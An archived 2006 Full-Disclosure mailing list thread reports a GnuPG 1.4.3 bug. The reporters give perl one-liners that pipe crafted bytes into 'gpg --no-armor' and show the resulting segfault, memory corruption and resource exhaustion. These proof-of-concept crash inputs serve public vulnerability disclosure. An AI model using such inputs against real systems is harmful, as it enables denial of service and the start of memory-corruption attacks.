Ethical Hacking

Learn to find vulnerabilities before the bad guys do! Gain real world hands on hacking experience in our state of the art hacking lab. Course designed and taught by expert instructors with years of penetration testing experience. 12 student maximum in every class. Certification attempt included in every package.
Computer Forensics Training at InfoSec Institute

Gain the in-demand skills of a certified computer examiner, learn to recover trace data left behind by fraud, theft, and cybercrime perpetrators. Discover the source of computer crime and abuse at your organization so that it never happens again. All of our class sizes are guaranteed to be 12 students or less to facilitate one-on-one interaction with one of our expert instructors.




Network Security FullDisclosure
[Top] [All Lists]
<prev [Date] next>
[Advanced]
 <prev [Thread] next>

[Full-disclosure] RE: GnuPG fun

from [Sigint Consulting] Network Security [Permanent Link]
Subject: [Full-disclosure] RE: GnuPG fun
Date: Wed, 31 May 2006 06:54:48 -0700 
Evgeny,

Yes this and variations of it produce some interesting output (AMD64
Gentoo)

$ perl -e 'print "\xcd\x7f\x7f\x7f\x7f\xfe"'| gpg --no-armor
gpg: orphaned user ID
$

This will proceed to eat all available CPU and memory until it dies
(approx 1-2 minutes later)

$perl -e 'print "\xcd\xff\x7f\x7f\x7f\x7f"'| gpg --no-armor
gpg: orphaned user ID

Memory Error: memory at 0x2aaaabb99018 corrupted (overflow=55)
Aborted
$

which is probably related to this

$perl -e 'print "\xcd\xff\xff\x7f\x7f\xfe"'| gpg --no-armor
gpg: out of  memory while allocating 4286546022 bytes
$

Chris


Hi,

Interesting GnuPG 1.4.3 bug:

$ perl -e 'print "\xcd\xff\xff\xff\xff\xfe"'| /var/gnupg/bin/gpg --no-armor
gpg: /home/ggg/.gnupg/options:82: deprecated option "honor-http-proxy"
gpg: please use "keyserver-options http-proxy" instead

gpg: Segmentation fault caught ... exiting
Segmentation fault

Regards,
Evgeny Legerov
www.gleg.net


_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
[More messages with this same subject...]




<Prev in Thread] Current Thread [Next in Thread>
  • [Full-disclosure] RE: GnuPG fun, Sigint Consulting <=
Previous by Date:  [Full-disclosure] working contact for 3ware.com?, Tonu Samuel
Next by Date:  [Full-disclosure] [SECURITY] [DSA 1084-1] New typespeed packages fix arbitrary code execution, Steve Kemp
Previous by Thread:  [Full-disclosure] working contact for 3ware.com?, Tonu Samuel
Next by Thread:  [Full-disclosure] [SECURITY] [DSA 1084-1] New typespeed packages fix arbitrary code execution, Steve Kemp
Indexes:  [Date] [Thread] [Top] [All Lists]